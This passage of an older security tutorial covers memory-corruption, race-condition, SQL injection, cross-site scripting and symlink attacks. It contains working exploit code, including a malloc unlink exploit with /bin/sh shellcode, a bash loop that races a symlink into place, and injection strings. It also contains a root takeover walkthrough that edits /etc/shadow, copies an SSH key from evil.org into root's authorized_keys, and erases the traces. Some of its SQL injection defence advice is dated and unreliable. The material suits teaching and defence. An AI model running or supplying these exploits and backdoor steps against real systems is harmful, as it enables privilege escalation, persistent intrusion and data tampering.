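void plan_pads(unsigned printed, unsigned long addr, unsigned pads[4])
{
    int i;

    for (i = 0; i < 4; i++) {
        unsigned char target = (unsigned char)(addr >> (8 * i));

        pads[i] = pad_for_byte(printed, target);
        printed += pads[i];
    }
}
```

With the values from this example, plan_pads(0x58, 0x08048424, pads) gives 204, 96, 128 and 260. The last value is 4 + 256, chosen so that the field width is guaranteed to decide how many characters are printed.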
The best source of information on format strings is the paper by scut of TESO at http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html
One of the more advanced techniques does not overflow memory to overwrite its target directly, but instead overflows a structure, which then influences the execution of the program. The technique is the malloc overflow. It is not the subject of this paper to discuss exactly how malloc works, but the general idea is that it allocates memory upon request, and frees it up when you say you are done with it. One of the things involved in this chunked allocation is making sure free chunks don't turn into fragments. The basic layout of a chunk is the following.
previous_size   (4 bytes)
size            (4 bytes)
forward_pointer (4 bytes)
reverse_pointer (4 bytes)
When a block is allocated, only previous_size and size are in use. Basically previous_size and size allow the system to traverse the physical blocks in the memory, allocated or not. Subtracting previous_size from the address of the current block gets you the previous block, adding size to this one gets you the next. When a block is freed, the forward and reverse pointers point to other blocks that are also free. The way the free block list is laid out is usually a doubly linked list. This brings up one last operation, which is coalescing. Whenever a block is freed, and the next block is also free, then the system will put the two together into one larger free block. During this operation the second block must be removed from the free list, which is the standard algorithm for removing a node from a doubly linked list.
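The list removal mentioned above can be sketched in a few lines. This is a simplified illustration and not the code of any particular allocator: the struct and function names are made up for the example, and the fields use size_t and pointers so that it compiles on any platform, whereas the layout listed above assumes 4-byte fields.

```c
#include <stddef.h>

/* Simplified chunk header following the layout listed above.
   The names are illustrative only. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;   /* forward pointer, meaningful only while free */
    struct chunk *bk;   /* reverse pointer, meaningful only while free */
};

/* Standard removal of p from a doubly linked list. Both stores go
   through pointers read from p itself, with no validation at all. */
void unlink_chunk(struct chunk *p)
{
    struct chunk *fwd = p->fd;
    struct chunk *bck = p->bk;

    fwd->bk = bck;      /* store to the address fwd + offsetof(bk) */
    bck->fd = fwd;      /* store to the address bck + offsetof(fd) */
}
```

On a well-formed list this simply splices the neighbours together. The point to notice is that the routine trusts p->fd and p->bk completely, so whoever controls those two fields controls where the two stores land.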
One trick of exploiting malloc is that if you can convince it that the next block is free, and that the block after that has PREV_INUSE set to 0, then it will run an algorithm that ends up using prev and next pointers that you are able to specify for this list removal procedure. The end result is that the value of reverse_pointer is written to the address forward_pointer + 12, so forward_pointer is set to the target address - 12 (12 being the offset of reverse_pointer within the chunk). The following is an example of how such memory manipulations make execution of code possible. A remote exploitation would overwrite a function pointer in the dynamic linker or a saved eip instead of the local function pointer.
#include <stdio.h>
#include <stdlib.h>

char shellcode[] =
    "\xeb\x0appssssffff"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void bar()
{
    printf("Not Today!\n");
    exit(1);
}

int main(int argc, char ** argv)
{
    void (*fptr)(void);
    int * blob;
    int * blab;
    fptr = bar;
    blob = malloc(1024);
    blab = malloc(1024);
    /* forge the header and list pointers of the chunk after blob */
    *(blab-2) = ~0x1;
    *(blab-1) = -4;
    *(blab) = &fptr - 3;
    *(blab+1) = shellcode;
    free(blob);
    fptr();
    free(blab);
}
Once you find such vulnerable code, the standard method of overwriting eip or even a function pointer in the dynamic linker will work for taking control of execution. One thing to be aware of is that in the block that is getting freed, the first 8 bytes will be overwritten by the forward and reverse pointers. This is only a taste of the topic, which is limitless in possibilities for exploitation and creativity. For a more detailed discussion on the topic see http://www.phrack.org/show.php?p=57&a=8
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char ** argv)
{
    struct stat sbuf;
    int ret;
    ret = lstat("/tmp/lockfile",&sbuf);
    if (!S_ISLNK(sbuf.st_mode))
    {
        /* the file can be replaced between the lstat above and this chown */
        chown("/tmp/lockfile",getuid(),getgid());
    }
    unlink("/tmp/lockfile");
}
At first glance this code appears to prevent the attack where someone makes /tmp/lockfile a symlink somewhere else, however there is a special case here. What happens if someone creates a link called /tmp/lockfile between the time lstat returns and when chown() is called? This subtle problem is the race condition.
Creating an exploit for this program is not too difficult. All we have to do is keep creating a link to another file over and over while also running this program over and over, until the link lands inside the window. A small shell script can do both.
#!/bin/bash
while true; do
    ln -s /tmp/victim /tmp/lockfile&
    ./a.out&
done
After running this script for a while it will eventually chown the victim file. Many similar pieces of code suffer from the same problem. The following program also has a race condition flaw. The problem is that the sig function can be interrupted by a second signal and run again, which is incompatible with the malloc and free model of memory management because the same buffers end up being freed twice.
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

void * buf1, * buf2;

void sig(int tint)
{
    free(buf1);
    free(buf2);
}

int main(int argc, char ** argv)
{
    signal(SIGHUP,sig);
    signal(SIGTERM,sig);
    sleep(100);
}
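One common way to avoid this kind of flaw is to keep the handler trivial and do the real work outside of it. The following is a minimal sketch of that idea, not a drop-in fix. The names on_signal, install_handlers and cleanup_if_requested are hypothetical, and the program is assumed to call cleanup_if_requested from its main loop.

```c
#include <signal.h>
#include <stdlib.h>

static void *buf1, *buf2;
static volatile sig_atomic_t cleanup_requested = 0;

/* The handler only records that a signal arrived. Running it twice,
   or interrupting it with another signal, is harmless. */
static void on_signal(int signo)
{
    (void)signo;
    cleanup_requested = 1;
}

/* Install the same handler for both signals; returns 0 on success. */
int install_handlers(void)
{
    if (signal(SIGHUP, on_signal) == SIG_ERR)
        return -1;
    if (signal(SIGTERM, on_signal) == SIG_ERR)
        return -1;
    return 0;
}

/* Called from normal program flow, never from the handler. Each
   buffer is freed at most once. Returns 1 if cleanup ran. */
int cleanup_if_requested(void)
{
    if (!cleanup_requested)
        return 0;
    cleanup_requested = 0;
    free(buf1);
    buf1 = NULL;
    free(buf2);
    buf2 = NULL;
    return 1;
}
```

Because free is never called from the handler, a second signal arriving at a bad moment can only set the flag again.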
SQL injection attacks are the result of turning a data stream into a command stream. SQL commands are issued to the server in the form of queries. SELECT * FROM users would be a query. The problem arises whenever an attacker can insert their own additions to a command. A sample vulnerable query would be SELECT * FROM users WHERE id = $VAR. Let's take a look at a vulnerable script.
The database.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21 to server version: 4.0.18
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use hn;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> describe items;
+----------+---------+------+-----+---------+----------------+
| Field    | Type    | Null | Key | Default | Extra          |
+----------+---------+------+-----+---------+----------------+
| id       | int(11) |      | PRI | NULL    | auto_increment |
| score    | float   | YES  |     | NULL    |                |
| numvotes | int(11) | YES  |     | NULL    |                |
| body     | text    | YES  |     | NULL    |                |
+----------+---------+------+-----+---------+----------------+
4 rows in set (0.01 sec)
mysql>
<?
mysql_pconnect("localhost","user","pass") or die(mysql_error());
mysql_select_db("db") or die("2: Could not select database.");
$var1 = $_POST['var1'];
if ($var1)
{
$query = "SELECT * FROM items WHERE id=$var1";
$qrh = mysql_query($query);
if ($qrh)
{
$nrows = mysql_num_rows($qrh);
echo $nrows;
}
}
?>
From this improperly written PHP page, we can specify an integer to look up that ID. If this were login code, it would probably check whether the number of rows returned was greater than or equal to 1. To pass such a check we could make the SELECT statement grab more rows by making the condition always evaluate to true. We would do this by appending OR 1 to the end of the query. So on the input form we would put 5 OR 1. The entire query would be SELECT * FROM items WHERE id=5 OR 1, which would select every row in the table.
The correct way to prevent such an attack of adding additional parts to the query is to wrap every variable in single tics ('). Here is the script again, but written without the flaw.
<?
mysql_pconnect("localhost","user","pass") or die(mysql_error());
mysql_select_db("db") or die("2: Could not select database.");
$var1 = $_POST['var1'];
if ($var1)
{
$query = "SELECT * FROM items WHERE id='$var1'";
$qrh = mysql_query($query);
if ($qrh)
{
$nrows = mysql_num_rows($qrh);
echo $nrows;
}
}
?>
Although ticing a variable is all you need to do with PHP and mysql when PHP's magic_quotes_gpc setting is enabled, other languages don't have this feature. You might have been thinking along the same lines as so many others about the ticing: what happens if they tic the variable, and I untic it? Say the query is SELECT * FROM items WHERE id = '$var1'. What if I set $var1 to be 1' OR 1? With magic_quotes_gpc on, this will have no effect, because PHP automatically escapes the ' in the submitted value so it cannot close the tic. If that setting is off, or in other languages that don't do this automatically, the programmer must escape the input explicitly and know all the ways the query can be altered.
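A check that does not depend on any automatic escaping is to accept only what the column can actually hold. Since id is an int(11), the input can be rejected unless it is a plain decimal number. The sketch below shows the idea in C, the language used for most examples in this paper; parse_id is a hypothetical helper, and the same test would be applied in whatever language builds the query.

```c
#include <errno.h>
#include <stdlib.h>

/* Parse s as a non-negative decimal id. Returns 0 and stores the
   value in *out on success; returns -1 if s is anything else. */
int parse_id(const char *s, long *out)
{
    char *end;
    long v;

    if (s == NULL || *s < '0' || *s > '9')
        return -1;      /* empty input, sign, or leading whitespace */
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;      /* overflow, or trailing text such as " OR 1" */
    *out = v;
    return 0;
}
```

Inputs such as 5 OR 1 and 1' OR 1 are rejected outright, so they never reach the query at all.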
A more advanced technique involves using subqueries. The tactic here is to embed another query in the one you are modifying. Not all SQL servers support this; MySQL, for instance, needs to be version 4.1 or greater. Most SQL servers do support it, and it is a very powerful technique for extracting data. The only challenge is that you must comply with the type constraints of the query. If the query is set to return a record, you must return the same kind of record. If it fills a field, you must return the type that the field expects.
A good article on SQL injection is located here http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Web browsers provide an interesting opportunity to attack users. If an attacker wants access to joeuser's bank account at xyzbank.com, then according to the principles of exploitation all he has to do is be able to run code as joeuser. Once joeuser is exploited, the attacker will have full control over joeuser's xyzbank.com account. The observant reader may already have spotted the easy opportunity here. That opportunity is joeuser's web browser.
Internet browsing software has advanced very quickly, and now most browsers are so complicated that fully working programs can easily be created in webpages with Java and VBScript. Add to this the ability to communicate with the local file system and the network through automatic link loading via IMG tags or JavaScript links, and you have the power to do almost anything. One of the real points of weakness, and power to the attacker, is the fact that FORM submissions are just regular requests.
The most direct form of cross site scripting is finding a way to insert commands into a website that already lets users add content to it. If the attacker can craft specially designed code for that site, they can make visitors run code that could do anything to the page: make them load other pages, submit forms, send data back to the site, or just about anything imaginable. The most common use of this is filling out forms. An attacker will craft a page that has a form set up in it, which is submitted with JavaScript. The victim will barely notice anything until they see that they posted an embarrassing message on a board, bought thousands of dollars worth of merchandise, or divulged confidential information on a private website. The characteristics of this attack are the additions to the actual webpage, and the ability to prevent the attack by filtering data on both ends.
The less direct method of attack is to create links for a user to press. The trick here is in how forms are created and processed. For a form using the GET method, there is nothing to stop someone from creating a link that sends variables to it. The webserver has no way to tell the difference between a submitted form and a clicked link. To it, a form with the field test set to value is exactly the same as file.php?test=value. Although this was in the form of a GET request, which can be told apart from a POST request, it is only a trivial modification to make a form submit something to any site. This attack does not occur by modifying the server page. Detection is thus more difficult, and the server must be ready to handle the case where requests are not correctly referred.
Site attacks of cross site scripting are fairly well documented in this FAQ http://www.cgisecurity.com/articles/xss-faq.shtml. Client attacks of linking to filled out forms are less documented.
As if security wasn't hard enough with having to worry about buffer overflows, correct usage of format strings, possible timing issues, and validating input, what if you went to write to a file, but you weren't really writing to it? Unfortunately that can happen all too easily. The problem is the ability to form a link to another file. In UNIX and Linux links come in two varieties, hard and soft. Hard links are actually part of the filesystem. A hard link is a new pointer to the same blocks that the file is stored in, and there is no way to tell that it is a link. Soft links, on the other hand, are just files that contain the path to the linked file. Although the two are vastly different, they operate in the same manner under most circumstances. The difference is that the functions that allow a program to check if a file is a link do not work with hard links. Protecting against soft links is a job for the application. Hard links must be protected against in the kernel, by disallowing users from linking to files they don't have access to.
A major piece of software is vulnerable to this flaw: the ch* utilities. The problem with all of the ch* utilities is that they default to following links, even when operating recursively. It might not sound like such a bad thing initially, but when you realize that a chown -R user ~user can fatally compromise your system, it does start to sound like a bad thing. A simple link to /etc/shadow, created by user with ln -s /etc/shadow ~user/testfile, would let him take ownership of the shadow file if he could convince the administrator to run such a command.
Any software that is run on files that may have been created by another user is subject to similar abuses. The most common directory for this is /tmp, because everyone uses it, and everyone can write to it. Combined, those two facts mean that other users can potentially provide input to a program you are running. To check a file safely, open it once (refusing to follow a link, for example with O_NOFOLLOW where it is available) and use its fd for all the checks you wish to run, such as fstat. If you do not use the f* calls, you open the program up to a race condition between the time you check the file and the time you reopen it.
A sample exploitation of the ch* utilities follows here.
$ ln -s /etc/shadow testfile
User calls the administrator and says that they need ownership of all files in their directory, because the webserver wrote back some files owned by www as part of their CGI script. The administrator is bothered, but just does the job quickly to get the user off the phone.
# chown -R user ~user
User realizes that he can now do whatever he wants with the shadow file, so he copies down the root shadow entry and changes it to match his own. He then logs in as root, backdoors the system, and changes the root shadow entry back to what it was before. Attacker has chown'ed system.
$ grep root /etc/shadow
$ grep user /etc/shadow
$ vi /etc/shadow
$ su
password:
# scp user@evil.org:sshkey .
# cat sshkey >> ~root/.ssh/authorized_keys
# rm sshkey
# vi /etc/shadow
# chown root /etc/shadow
# rm ~user/testfile
# exit
$
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char ** argv)
{
    FILE * fd;
    if (argc <= 1) exit(1);
    /* fixed, predictable name in a world-writable directory */
    if ((fd = fopen("/tmp/tool.temp","a")) == NULL)
    {
        exit(1);
    }
    fprintf(fd,"%s",argv[1]);
    fclose(fd);
    return 0;
}
Given the tool above, if the attacker creates a link called /tmp/tool.temp to some other file, he can get the administrator to append data to it. Depending on what file the attacker links to, and what gets appended, this could either crash the system or even give the attacker root. The following is an attack on the tool.
$ ln -s /bin/login /tmp/tool.temp
The attacker waits for the administrator to run the tool. As soon as he does, /bin/login is corrupt, and the system is unusable.